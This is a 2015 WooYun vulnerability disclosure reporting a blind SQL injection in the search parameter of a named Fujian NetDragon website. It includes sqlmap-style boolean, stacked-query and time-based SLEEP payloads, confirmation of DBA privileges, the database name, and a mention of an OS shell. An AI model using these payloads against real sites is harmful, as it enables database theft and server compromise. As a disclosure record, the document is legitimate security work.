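Vulnerability summary

Bug ID: wooyun-2015-0117469

Vulnerability title: Blind SQL injection on a Fujian NetDragon (福建网龙) site affects core data, DBA privileges

Vendor: Fujian NetDragon (福建网龙)

Reported by: 路人甲

Submitted: 2015-06-01 11:41

Fixed: 2015-07-16 20:08

Disclosed: 2015-07-16 20:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]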


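Vulnerability details

Disclosure status:

2015-06-01: Details reported to the vendor; awaiting vendor handling
2015-06-01: Vendor confirmed; details disclosed to the vendor only
2015-06-11: Details disclosed to core white hats and experts in the relevant field
2015-06-21: Details disclosed to regular white hats
2015-07-01: Details disclosed to trainee white hats
2015-07-16: Details disclosed to the public

Brief description:

233

Detailed description:

http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 (keyword search)

Proof of vulnerability: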

---
Parameter: SearchTxt (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page=1&SearchTxt=-2599' OR 9566=9566 AND 'Sdri' LIKE 'Sdri&tag=1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: page=1&SearchTxt=1';(SELECT * FROM (SELECT(SLEEP(5)))ZcZJ)#&tag=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=1&SearchTxt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))bKfN) AND 'ihhG' LIKE 'ihhG&tag=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11
current user is DBA: True
Database: ln_zsxx
[126 tables]

os-shell

Remediation:

~

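Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-06-01 20:07

Vendor reply:

Thanks to 路人甲 for reporting the vulnerability; a fix is being arranged.

Latest status:

None yet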